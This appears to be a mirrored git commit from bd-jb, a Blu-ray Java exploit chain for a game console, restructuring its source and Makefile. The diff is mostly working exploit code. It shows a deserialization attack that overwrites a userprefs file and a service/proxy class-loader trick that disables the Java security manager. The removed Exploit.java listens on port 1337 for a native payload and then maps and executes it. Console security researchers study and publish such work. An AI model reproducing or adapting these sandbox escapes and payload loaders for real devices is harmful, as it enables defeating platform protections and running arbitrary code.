mirror of
https://github.com/TheOfficialFloW/bd-jb
synced 2024-12-21 22:18:50 -05:00
Restructure source code and improve Makefile.
This commit is contained in:
parent
94188d249f
commit
fab3db6d51
1
.gitignore
vendored
1
.gitignore
vendored
@ -1,4 +1,5 @@
|
||||
.idea/
|
||||
build/
|
||||
tools/
|
||||
lib/
|
||||
disc/CERTIFICATE/id.bdmv
|
||||
|
83
Makefile
83
Makefile
@ -1,34 +1,57 @@
|
||||
CLASSES = \
|
||||
com/bdjb/ExploitXlet.java \
|
||||
com/bdjb/Exploit.java \
|
||||
com/bdjb/ExploitInterface.java \
|
||||
com/bdjb/ExploitUserPrefsImpl.java \
|
||||
com/bdjb/ExploitServiceProxyImpl.java \
|
||||
com/bdjb/IxcProxyImpl.java \
|
||||
com/bdjb/ServiceInterface.java \
|
||||
com/bdjb/ServiceImpl.java \
|
||||
com/bdjb/ProviderAccessorImpl.java \
|
||||
com/bdjb/PayloadClassLoader.java \
|
||||
com/bdjb/Payload.java \
|
||||
com/bdjb/UnsafeInterface.java \
|
||||
com/bdjb/UnsafeJdkImpl.java \
|
||||
com/bdjb/UnsafeSunImpl.java \
|
||||
com/bdjb/API.java \
|
||||
com/bdjb/JIT.java \
|
||||
com/bdjb/Screen.java \
|
||||
BUILD = build
|
||||
BDMV = bdmv
|
||||
DISC = disc
|
||||
LIB = lib
|
||||
SRC = src
|
||||
TOOLS = tools
|
||||
|
||||
all:
|
||||
javac com/bdjb/PayloadClassLoaderSerializer.java && java com/bdjb/PayloadClassLoaderSerializer
|
||||
javac -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "lib/rt.jar:lib/bdjstack.jar" $(CLASSES)
|
||||
jar cf disc/BDMV/JAR/00000.jar com/bdjb/*.class com/bdjb/*.ser com/bdjb/bluray.ExploitXlet.perm
|
||||
java -cp "tools/security.jar:tools/bcprov-jdk15-137.jar:tools/tools.jar" net.java.bd.tools.security.BDSigner disc/BDMV/JAR/00000.jar
|
||||
java -jar tools/bdjo.jar bdmv/bdjo.xml disc/BDMV/BDJO/00000.bdjo
|
||||
java -jar tools/MovieObject.jar bdmv/MovieObject.xml disc/BDMV/MovieObject.bdmv
|
||||
java -jar tools/index.jar bdmv/index.xml disc/BDMV/index.bdmv
|
||||
java -jar tools/id.jar bdmv/id.xml disc/CERTIFICATE/id.bdmv
|
||||
CLASSES = \
|
||||
$(SRC)/com/bdjb/ExploitXlet.java \
|
||||
$(SRC)/com/bdjb/Exploit.java \
|
||||
$(SRC)/com/bdjb/UnsafeInterface.java \
|
||||
$(SRC)/com/bdjb/UnsafeJdkImpl.java \
|
||||
$(SRC)/com/bdjb/UnsafeSunImpl.java \
|
||||
$(SRC)/com/bdjb/API.java \
|
||||
$(SRC)/com/bdjb/JIT.java \
|
||||
$(SRC)/com/bdjb/Screen.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
|
||||
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
|
||||
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
|
||||
|
||||
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
|
||||
|
||||
all: directory serialized classes jar bdmv
|
||||
|
||||
directory:
|
||||
mkdir -p $(BUILD)
|
||||
|
||||
serialized:
|
||||
javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
|
||||
java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
|
||||
rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
|
||||
|
||||
classes:
|
||||
javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
|
||||
|
||||
jar:
|
||||
rm -rf $(BUILD)/jdk
|
||||
cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
|
||||
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
|
||||
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
|
||||
|
||||
bdmv:
|
||||
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
|
||||
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
|
||||
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
|
||||
java -jar $(TOOLS)/id.jar $(BDMV)/id.xml $(DISC)/CERTIFICATE/id.bdmv
|
||||
|
||||
clean:
|
||||
rm -rf jdk/internal/misc/*.class
|
||||
rm -rf com/bdjb/*.class
|
||||
rm -rf com/bdjb/*.ser
|
||||
rm -rf build
|
||||
rm -rf META-INF
|
||||
|
@ -1,93 +0,0 @@
|
||||
/*
|
||||
* Copyright (C) 2021 Andy Nguyen
|
||||
*
|
||||
* This software may be modified and distributed under the terms
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
import java.io.OutputStream;
|
||||
import java.net.InetAddress;
|
||||
import java.net.ServerSocket;
|
||||
import java.net.Socket;
|
||||
|
||||
class Exploit implements Runnable {
|
||||
static void init() {
|
||||
Screen.println("[+] bd-jb by theflow");
|
||||
|
||||
Screen.println("[*] Disabling security manager...");
|
||||
|
||||
ExploitInterface[] exploits =
|
||||
new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
|
||||
|
||||
for (int i = 0; i < exploits.length; i++) {
|
||||
try {
|
||||
exploits[i].trigger();
|
||||
if (System.getSecurityManager() == null) {
|
||||
break;
|
||||
}
|
||||
} catch (Exception e) {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
if (System.getSecurityManager() != null) {
|
||||
Screen.println("[-] Error could not disable security manager.");
|
||||
}
|
||||
}
|
||||
|
||||
static void start() {
|
||||
new Thread(new Exploit()).start();
|
||||
}
|
||||
|
||||
public void run() {
|
||||
if (System.getSecurityManager() != null) {
|
||||
return;
|
||||
}
|
||||
|
||||
try {
|
||||
Screen.println("[*] Installing native API...");
|
||||
API api = API.getInstance();
|
||||
|
||||
Screen.println("[*] Enabling JIT...");
|
||||
JIT jit = JIT.getInstance();
|
||||
|
||||
Screen.println(
|
||||
"[*] Listening for payload on "
|
||||
+ InetAddress.getLocalHost().getHostAddress()
|
||||
+ ":1337...");
|
||||
|
||||
ServerSocket serverSocket = new ServerSocket(1337);
|
||||
Socket socket = serverSocket.accept();
|
||||
|
||||
Screen.println("[*] Downloading payload...");
|
||||
|
||||
InputStream inputStream = socket.getInputStream();
|
||||
OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");
|
||||
|
||||
byte[] buf = new byte[8192];
|
||||
int read;
|
||||
while ((read = inputStream.read(buf)) > 0) {
|
||||
outputStream.write(buf, 0, read);
|
||||
}
|
||||
|
||||
outputStream.close();
|
||||
inputStream.close();
|
||||
|
||||
socket.close();
|
||||
|
||||
Screen.println("[*] Mapping payload...");
|
||||
long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
|
||||
Screen.println("[+] payload: " + Long.toHexString(payload));
|
||||
|
||||
Screen.println("[*] Executing payload...");
|
||||
int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
|
||||
Screen.println("[+] Result: " + ret);
|
||||
} catch (Exception e) {
|
||||
Screen.println("[-] Error: " + e.getMessage());
|
||||
}
|
||||
}
|
||||
}
|
69
src/com/bdjb/Exploit.java
Normal file
69
src/com/bdjb/Exploit.java
Normal file
@ -0,0 +1,69 @@
|
||||
/*
|
||||
* Copyright (C) 2021 Andy Nguyen
|
||||
*
|
||||
* This software may be modified and distributed under the terms
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
|
||||
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
||||
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
|
||||
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
|
||||
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
import java.io.OutputStream;
|
||||
import java.net.InetAddress;
|
||||
import java.net.ServerSocket;
|
||||
import java.net.Socket;
|
||||
|
||||
class Exploit implements Runnable {
|
||||
static void init() {
|
||||
Screen.println("[+] bd-jb by theflow");
|
||||
|
||||
Screen.println("[*] Escaping Java Sandbox...");
|
||||
|
||||
ExploitSandboxInterface[] exploits =
|
||||
new ExploitSandboxInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
|
||||
|
||||
for (int i = 0; i < exploits.length; i++) {
|
||||
try {
|
||||
exploits[i].trigger();
|
||||
if (System.getSecurityManager() == null) {
|
||||
break;
|
||||
}
|
||||
} catch (Exception e) {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
if (System.getSecurityManager() != null) {
|
||||
Screen.println("[-] Error could not disable security manager.");
|
||||
}
|
||||
}
|
||||
|
||||
static void start() {
|
||||
new Thread(new Exploit()).start();
|
||||
}
|
||||
|
||||
public void run() {
|
||||
if (System.getSecurityManager() != null) {
|
||||
return;
|
||||
}
|
||||
|
||||
Screen.println("[*] Exploiting kernel...");
|
||||
|
||||
ExploitKernelInterface[] exploits = new ExploitKernelInterface[] {};
|
||||
|
||||
for (int i = 0; i < exploits.length; i++) {
|
||||
try {
|
||||
if (exploits[i].trigger()) {
|
||||
break;
|
||||
}
|
||||
} catch (Exception e) {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
@ -5,8 +5,8 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.kernel;
|
||||
|
||||
interface ExploitInterface {
|
||||
public void trigger() throws Exception;
|
||||
public interface ExploitKernelInterface {
|
||||
public boolean trigger() throws Exception;
|
||||
}
|
12
src/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java
Normal file
12
src/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java
Normal file
@ -0,0 +1,12 @@
|
||||
/*
|
||||
* Copyright (C) 2021 Andy Nguyen
|
||||
*
|
||||
* This software may be modified and distributed under the terms
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
public interface ExploitSandboxInterface {
|
||||
public boolean trigger() throws Exception;
|
||||
}
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
@ -16,19 +16,19 @@ import java.security.Provider;
|
||||
import java.security.Security;
|
||||
|
||||
/** Implementation of the service+proxy exploit. */
|
||||
class ExploitServiceProxyImpl implements ExploitInterface {
|
||||
public class ExploitServiceProxyImpl implements ExploitSandboxInterface {
|
||||
private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";
|
||||
|
||||
private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
|
||||
private static final String NEW_INSTANCE_METHOD_SIGNATURE =
|
||||
"(Ljava/lang/Object;)Ljava/lang/Object;";
|
||||
|
||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
|
||||
|
||||
private static final String JAR_URL =
|
||||
"file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";
|
||||
|
||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
|
||||
|
||||
public void trigger() throws Exception {
|
||||
public boolean trigger() throws Exception {
|
||||
// Throw exception if class does not exist.
|
||||
Class.forName(SERVICE_CLASS_NAME);
|
||||
|
||||
@ -56,5 +56,7 @@ class ExploitServiceProxyImpl implements ExploitInterface {
|
||||
// Instantiate the payload class with all permissions to disable the security manager.
|
||||
Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
|
||||
payloadClass.newInstance();
|
||||
|
||||
return true;
|
||||
}
|
||||
}
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.InputStream;
|
||||
@ -14,16 +14,17 @@ import java.io.OutputStream;
|
||||
import org.havi.ui.HSceneFactory;
|
||||
|
||||
/** Implementation of the userprefs deserialization exploit. */
|
||||
class ExploitUserPrefsImpl implements ExploitInterface {
|
||||
private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";
|
||||
public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
|
||||
private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
|
||||
|
||||
private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";
|
||||
private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
|
||||
"/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
|
||||
|
||||
public void trigger() throws Exception {
|
||||
public boolean trigger() throws Exception {
|
||||
try {
|
||||
// Overwrite userprefs with a serialized PayloadClassLoader.
|
||||
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
|
||||
OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);
|
||||
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
|
||||
OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
|
||||
|
||||
byte[] buf = new byte[8192];
|
||||
int read;
|
||||
@ -42,15 +43,19 @@ class ExploitUserPrefsImpl implements ExploitInterface {
|
||||
|
||||
// Instantiate the payload class.
|
||||
PayloadClassLoader.getInstance().newPayload();
|
||||
|
||||
return true;
|
||||
}
|
||||
} finally {
|
||||
// Restore userprefs file.
|
||||
String[][] preferences = new String[9][];
|
||||
preferences[3] = new String[] {"26"};
|
||||
ObjectOutputStream outputStream =
|
||||
new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
|
||||
new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
|
||||
outputStream.writeObject(preferences);
|
||||
outputStream.close();
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
}
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import com.sony.gemstack.core.CoreAppContext;
|
||||
import com.sony.gemstack.core.CoreIxcClassLoader;
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.security.AccessController;
|
||||
import java.security.PrivilegedActionException;
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.InputStream;
|
||||
@ -19,8 +19,8 @@ import java.security.ProtectionDomain;
|
||||
class PayloadClassLoader extends ClassLoader implements Serializable {
|
||||
private static final long serialVersionUID = 0x4141414141414141L;
|
||||
|
||||
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/Payload.class";
|
||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
|
||||
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
|
||||
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
|
||||
|
||||
private static PayloadClassLoader instance;
|
||||
|
@ -5,8 +5,9 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import com.bdjb.exploit.sandbox.PayloadClassLoader;
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
|
||||
@ -14,8 +15,7 @@ import java.io.ObjectOutputStream;
|
||||
class PayloadClassLoaderSerializer {
|
||||
public static void main(String[] args) {
|
||||
try {
|
||||
ObjectOutputStream objectOutputStream =
|
||||
new ObjectOutputStream(new FileOutputStream("com/bdjb/PayloadClassLoader.ser"));
|
||||
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
|
||||
objectOutputStream.writeObject(new PayloadClassLoader());
|
||||
objectOutputStream.close();
|
||||
} catch (Exception e) {
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import com.oracle.ProviderAccessor;
|
||||
import com.oracle.ProviderAdapter;
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import com.oracle.security.Service;
|
||||
import java.util.List;
|
@ -5,7 +5,7 @@
|
||||
* of the MIT license. See the LICENSE file for details.
|
||||
*/
|
||||
|
||||
package com.bdjb;
|
||||
package com.bdjb.exploit.sandbox;
|
||||
|
||||
import java.rmi.Remote;
|
||||
import java.rmi.RemoteException;
|
Loading…
Reference in New Issue
Block a user